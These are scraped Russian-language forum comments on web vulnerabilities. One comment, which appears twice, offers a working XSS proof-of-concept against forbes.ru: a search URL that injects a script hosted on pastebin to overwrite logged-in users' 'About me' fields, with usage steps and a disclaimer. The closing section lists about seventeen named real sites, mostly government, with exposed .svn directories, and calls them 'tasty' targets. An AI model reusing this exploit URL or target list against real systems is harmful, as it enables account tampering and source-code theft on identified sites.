Идея, лежащая в основе этого браузера, SyncNet, чем-то похожа на идею, реализованную в TOR.
Я бы перефразировал:
«Идея, лежащая в основе этого браузера, SyncNet, взята чуть менее, чем полностью с идеи, реализованной во Freenet, которая существует уже почти 14 лет».
выкладывайте пример хоть по одному из приведенному сайту где произведены какое либо значимое действие (авторизация\изменение настроек\перевод) в отношении сайта
Да без проблем! Не поленился, написал специально для Вас код на JS, который, используя уязвимость на forbes.ru меняет каждое из полей «О себе» на «XSS PoC».
Скрипт относительно прост, написан на скорую руку, поэтому и комментариев нет. Писался только для PoC (Proof of Concept) эксплоита. Тестировался только в последней Mozilla Firefox.
Это лишь пример, но он наглядно демонстрирует, как с помощью XSS можно влиять на критически важную информацию пользователя.
Сам код находится здесь: http://pastebin.com/bgBmN6kB
Использовать (после авторизации, естественно) так: http://www.forbes.ru/search-content?keys=%22%3E%3Cscript%20src=%22http://pastebin.com/raw.php?i=bgBmN6kB%22%3E%3C/script%3E
Прошу заметить, что для вывода дебаг-лога используется всплывающее окно, созданное JavaScript'ом. Мозилла по-дефолту режет такие, поэтому для просмотра лога разрешить открытие нового окна, когда браузер это попросит.
Использование данного скрипта разрешено только в учебных целях. Я, автор вышеизложенного кода, не несу никакой ответственности за любое его незаконное использование.
Виджет для официальных страниц представляет из себя обычную HTML-страницу, которую в своём приложении может создать любой пользователь. За то, что аккаунт админа самого распространённого виджет-приложения взломан, должен нести ответственность исключительно его владелец.
Она позволяла удалить любую фотографию любого пользователя.
Вознаграждение автору от FB составило $12 500.
thehackernews.com/2013/09/vulnerability-allowed-hacker-to-delete.html
Уж очень интересно, как Yahoo на подобный баг отреагирует в финансовом плане.
Я бы перефразировал:
Зачем хранить в cookie идентификатор сессии размером ~1.5кб?
Это так тестируется выносливость сервера в случае возможных DDOS-атак? ;)
Да без проблем! Не поленился, написал специально для Вас код на JS, который, используя уязвимость на forbes.ru меняет каждое из полей «О себе» на «XSS PoC».
Скрипт относительно прост, написан на скорую руку, поэтому и комментариев нет. Писался только для PoC (Proof of Concept) эксплоита. Тестировался только в последней Mozilla Firefox.
Это лишь пример, но он наглядно демонстрирует, как с помощью XSS можно влиять на критически важную информацию пользователя.
Сам код находится здесь:
http://pastebin.com/bgBmN6kBИспользовать (после авторизации, естественно) так:
http://www.forbes.ru/search-content?keys=%22%3E%3Cscript%20src=%22http://pastebin.com/raw.php?i=bgBmN6kB%22%3E%3C/script%3EПрошу заметить, что для вывода дебаг-лога используется всплывающее окно, созданное JavaScript'ом. Мозилла по-дефолту режет такие, поэтому для просмотра лога разрешить открытие нового окна, когда браузер это попросит.
Использование данного скрипта разрешено только в учебных целях. Я, автор вышеизложенного кода, не несу никакой ответственности за любое его незаконное использование.
www2.lib.virginia.edu/exhibits/rave_reviews/.svn/text-base/
nmmlsc.health.unm.edu/HyperCyt/.svn/entries
hirise-test.lpl.arizona.edu/anaglyph/.svn/entries
oos.soest.hawaii.edu/timeplot/.svn/entries
archive.globe.gov/.svn/entries
www.hnrc.gov.cn/help/.svn/entries
rcm.swcb.gov.tw/FQD/.svn/entries
www.xcinfo.gov.cn/cms/.svn/entries
www.zjkyx.gov.cn/js/.svn/entries
www.sinavimo.gov.ar/files/.svn/entries
www.fire.tas.gov.au/mysite/cfanews/.svn/text-base/
fushun.gov.cn/web/webeditor/dialog/.svn/text-base/
www.hnrc.gov.cn/help/.svn/text-base/
www.wsbg.gov.cn/ww_web/images/BNT/.svn/text-base/
sig.mec.gov.br/administracontausuario/.svn/text-base/
portovelho.ro.gov.br:8080/crcf/greybox/.svn/text-base/
www.hbswjj.gov.cn/jsp/web/images/.svn/text-base/
«вкусненькие» сайты